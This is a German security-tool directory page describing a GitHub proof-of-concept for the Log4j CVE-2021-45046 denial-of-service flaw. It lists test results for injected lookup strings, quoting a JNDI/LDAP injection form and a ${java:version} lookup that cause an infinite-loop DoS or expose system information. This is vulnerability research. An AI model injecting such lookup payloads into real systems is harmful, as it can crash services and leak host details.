Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
Tools/GitHubGitHub/ludy-dev/cve-2021-45046
SchwachstellenanalyseExploitationWebanwendungs-ExploitationPapers & ForschungLernen & Bildung
GitHubludy-dev/cve-2021-45046

cve-2021-45046

Proof-of-Concept, das CVE-2021-45046 (Log4j DoS) mit Testfällen für Endlosschleifen, illegale Argumentausnahmen und Systeminfo-Exposition über JNDI-Lookups demonstriert.

Repository anzeigen
11vor 4 JahrenNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

log4j RCE (CVE-2021-44228) wurde in 2.15 gepatcht, jedoch wurde die neue Schwachstelle CVE-2021-45046 (verursacht DoS) entdeckt. Unten sind die Ergebnisse meiner Tests.

[Testumgebung] log4j-2.15.0 (api , core) JRE-1.8.0 jdk1.8.0_151 Eclipse IDE (Maven Project)

  1. Log4j RCE (CVE-2021-44228) Syntax-Test -> Not Vuln

image

  1. Einfügen eines beliebigen ctx-Objektnamens -> Not vuln

image

  1. Einfügen mit demselben Namen wie das Objekt, das den Context empfängt -> DoS durch Endlosschleife

image

  1. Einfügen in der Form ${jndi:ldap://127.0.0.1#[ldap-Serveradresse]} -> UnknownHostException tritt auf, kein DoS

image

  1. Form jndi:ldap://[ldap-Server]#[ldap-Server] -> Not vuln

image

  1. Einfügen von Java-Code -> DoS durch illegalArgmumentException

image

7-1. Einfügen von Java-Syntax -> System info exposure

image

7-2. Einfügen von Java-Syntax -> illegalArgmumentException, DoS tritt auf

image

-> Bei der Überprüfung der Stelle, an der die illegalArgumentException auftritt, scheint die Java-Syntax in 2-5, die System info exposure ermöglicht (${java:version}, eine beabsichtigte Routine zu sein.

image

Tool herunterladen